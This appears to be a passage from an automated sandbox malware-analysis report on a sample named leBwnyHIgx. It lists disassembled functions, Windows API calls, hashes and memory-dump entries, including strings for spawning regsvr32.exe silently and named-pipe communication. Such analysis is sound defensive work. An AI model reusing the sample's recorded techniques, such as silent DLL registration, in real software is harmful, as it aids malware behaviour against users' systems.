                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33,?,?,000000FC,0064E478,00000000,00400000,00000000), ref: 0064EE95
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0064EF09
                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33,?,?,000000FC,0064E478,00000000), ref: 0064EF17
                                                                                      • Part of subcall function 005F8EF4: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005F8FDA
                                                                                    • DestroyWindow.USER32(?,0064EF3A,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0064EF33,?,?,000000FC,0064E478,00000000,00400000), ref: 0064EF2D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                    • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                    • API String ID: 1779715363-2312673372
                                                                                    • Opcode ID: 77f6f6f6fb1eb5ada4cbe5229a27d75d8458d2c8502fe412c91970d5af7348ff
                                                                                    • Instruction ID: cb016fcbe83d026b746195098022f91b3a08dbab4975f128bac4cf3c8a8463a3
                                                                                    • Opcode Fuzzy Hash: 77f6f6f6fb1eb5ada4cbe5229a27d75d8458d2c8502fe412c91970d5af7348ff
                                                                                    • Instruction Fuzzy Hash: 04416D70A40208AFDB40EFB8DC52AEEBBF9FB09714F51446AF500F7691E6759E008B64
                                                                                    Function 0061AFDC Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124pipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,0061B1BF,?,00000000,0061B21A,?,?,?,00000000), ref: 0061B039
                                                                                    • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,?,?,00000000,0061B154,?,00000000,000000FF,00000000,00000000,00000000,0061B1BF), ref: 0061B096
                                                                                    • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,?,?,00000000,0061B154,?,00000000,000000FF,00000000,00000000,00000000,0061B1BF), ref: 0061B0A3
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000004FF), ref: 0061B0EF
                                                                                    • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,0061B12D,?,00000000), ref: 0061B119
                                                                                    • GetLastError.KERNEL32(?,?,00000000,000000FF,0061B12D,?,00000000), ref: 0061B120
                                                                                      • Part of subcall function 005F84D8: GetLastError.KERNEL32(00000000,005F91EE,00000005,00000000,005F9216,?,?,0066978C,?,00000000,00000000,00000000,?,00650A7F,00000000,00650A9A), ref: 005F84DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                    • String ID: CreateEvent$TransactNamedPipe
                                                                                    • API String ID: 2182916169-3012584893
                                                                                    • Opcode ID: f3f6691c1874f446a7c7284f1b6927ee4e9325dc9b34836dbe96d81c1e2aff7b
                                                                                    • Instruction ID: d0b5e641d23b1beaa1296b08846350201fa2eda204b4eae0268dfb10b8facce3
                                                                                    • Opcode Fuzzy Hash: f3f6691c1874f446a7c7284f1b6927ee4e9325dc9b34836dbe96d81c1e2aff7b
                                                                                    • Instruction Fuzzy Hash: 03418E70A00208AFDB01DF99CD91EEEBBB9FB0D314F1541A5FA14E7391D7749A90CA68
                                                                                    Function 005B155C Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005B1656,?,00000000), ref: 005B1583
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005B1656,?,00000000), ref: 005B15D6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressCloseHandleModuleProc
                                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                    • API String ID: 4190037839-2401316094
                                                                                    • Opcode ID: efbe6b4b6ec2bc001232fc299448c635db1c352edd7f61c9ee6d360b2af771fb
                                                                                    • Instruction ID: f3b80c1a87da7667449a85c8543438c8ab4114b066e130539604926b1af64128
                                                                                    • Opcode Fuzzy Hash: efbe6b4b6ec2bc001232fc299448c635db1c352edd7f61c9ee6d360b2af771fb
                                                                                    • Instruction Fuzzy Hash: C7219634A40604ABDB50EBB5CD66ADE7BE8FB84340FA04475E501E3581DB74BE408B58
                                                                                    Function 00407104 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00407119
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040711F
                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,005B1257,GetLogicalProcessorInformation), ref: 00407132
                                                                                    • GetLastError.KERNEL32(00000000,005B1257,GetLogicalProcessorInformation), ref: 0040713B
                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,005B1257,00000000,004071B2,?,00000000,005B1257,GetLogicalProcessorInformation), ref: 00407166
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                                                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                                    • API String ID: 1184211438-79381301
                                                                                    • Opcode ID: b2a0f765048d362bf3b63640f3b9e4d4cc1584ec48073b734667f4f9289056ab
                                                                                    • Instruction ID: 2a2551bed56c130c8612e6e6611bb7f0169533bd52abfaf2f231836d318f311a
                                                                                    • Opcode Fuzzy Hash: b2a0f765048d362bf3b63640f3b9e4d4cc1584ec48073b734667f4f9289056ab
                                                                                    • Instruction Fuzzy Hash: 99114571D08204BADB10EFA5D84576EBBF8EB44705F1481BBE914B73C1D67CAA808B5A
                                                                                    Function 0040ECE1 Relevance: 13.8, APIs: 9, Instructions: 257COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040ED98
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: 92cc54864dd0bbfb11f1611543af708f5326443a752958f50f1db9ea9fa0d6e6
                                                                                    • Instruction ID: f27d7ef7acb61dd46234c6ac8536030262216957dd27a0a5aa9c93a8a5e03d54
                                                                                    • Opcode Fuzzy Hash: 92cc54864dd0bbfb11f1611543af708f5326443a752958f50f1db9ea9fa0d6e6
                                                                                    • Instruction Fuzzy Hash: 6EA17E75900209EFDB24DFA5D880BAEB7B5BF58300F10893AE505B73C0D7B8A945CB94
                                                                                    Function 100164C3 Relevance: 13.6, APIs: 9, Instructions: 135COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __RTC_Initialize.LIBCMT ref: 1001650A
                                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 10016524
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                                                    • String ID:
                                                                                    • API String ID: 2442719207-0
                                                                                    • Opcode ID: 256b102e24a693d9f51ba83eb3981e94a0f04eba2416ad11eb438865fe32d69a
                                                                                    • Instruction ID: a50b9bcbe80e21d08239303d3e1b85a5ff725acd6039f41ad542be21913079e7
                                                                                    • Opcode Fuzzy Hash: 256b102e24a693d9f51ba83eb3981e94a0f04eba2416ad11eb438865fe32d69a
                                                                                    • Instruction Fuzzy Hash: A7419372E01629AFDB21CF94DD41B9E7AB9EB4C690F118129F8146F151C731DE818BE0
                                                                                    Function 00619BC0 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 124COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005B09C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005B09D7
                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00619D70,?, /s ",0066978C,regsvr32.exe",?,00619D70), ref: 00619CDE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseDirectoryHandleSystem
                                                                                    • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                    • API String ID: 2051275411-1862435767
                                                                                    • Opcode ID: bb828082893d3c3d641e3fdd4af0eaaf4cc23e92c20017eec766e67e36a9a3d6
                                                                                    • Instruction ID: 91a7d65596da60d3ab410b317687a4738a38aed02517376cad794b957d245f8b
                                                                                    • Opcode Fuzzy Hash: bb828082893d3c3d641e3fdd4af0eaaf4cc23e92c20017eec766e67e36a9a3d6
                                                                                    • Instruction Fuzzy Hash: A5413F70E0024C9BDB14EFE5D892ADDBBBAAF49304F64407EE504B7282D7746E44CB65
                                                                                    Function 10012150 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012187
                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012194
                                                                                    • ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001219F
                                                                                    • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 100121BB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?epptr@?$basic_streambuf@Pninc@?$basic_streambuf@
                                                                                    • String ID:
                                                                                    • API String ID: 1504536088-3916222277
                                                                                    • Opcode ID: b236a37fb06bdb8dee8e7b599258b0d5f450d0f7872909518222e9a22227080f
                                                                                    • Instruction ID: a0487576b8a3c5ffe6c335ea50ad64326e07086e404223857e371bd2d0d575a7
                                                                                    • Opcode Fuzzy Hash: b236a37fb06bdb8dee8e7b599258b0d5f450d0f7872909518222e9a22227080f
                                                                                    • Instruction Fuzzy Hash: 9C5161F5D00119EFDB04CFD4D8819EEBBB5EF48244F148459E901AB241EB34EBA4CBA5
                                                                                    Function 0040430C Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,?,00000000,02453360,0040763A,?,00000000,02453360,004072DD,00000000,00000220,0042715C,?,004271AA,005B1257,00000000), ref: 004043A2
                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,00000000,02453360,0040763A,?,00000000,02453360,004072DD,00000000,00000220,0042715C,?,004271AA,005B1257), ref: 004043BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 01c8de7d1c52f1379436ba32370cb002541e89dbe2850501a5063f81bbc03de1
                                                                                    • Instruction ID: 18b38d09955f91067994ce57c2704c259faaba03eea283e8c2a7273f2993d898
                                                                                    • Opcode Fuzzy Hash: 01c8de7d1c52f1379436ba32370cb002541e89dbe2850501a5063f81bbc03de1
                                                                                    • Instruction Fuzzy Hash: E97132716043104BD315DF69C984B16BBD8AFC5315F1482BFE984AB3D2C7B8C901CB89
                                                                                    Function 005A2B7C Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCapture.USER32 ref: 005A2BA2
                                                                                    • IsWindowUnicode.USER32(00000000), ref: 005A2BE5
                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,?), ref: 005A2C00
                                                                                    • SendMessageA.USER32(00000000,-0000BBEE,00000000,?), ref: 005A2C1F
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 005A2C2E
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 005A2C3F
                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,?), ref: 005A2C5F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1994056952-0
                                                                                    • Opcode ID: 79780fc3bec1803b35e57a68d2ec923f4b549fb1d4fc9166e9bf7d30cdcaf988
                                                                                    • Instruction ID: 4dfba5f3d1d218beddb166fd502ba4ee7a64a30cf6ddade1315904ca74e7163d
                                                                                    • Opcode Fuzzy Hash: 79780fc3bec1803b35e57a68d2ec923f4b549fb1d4fc9166e9bf7d30cdcaf988
                                                                                    • Instruction Fuzzy Hash: 51219CB12046096FA620FA5DCA82FAF77DCEF06724F10842AF959C3242EA54FC509774
                                                                                    Function 00404504 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
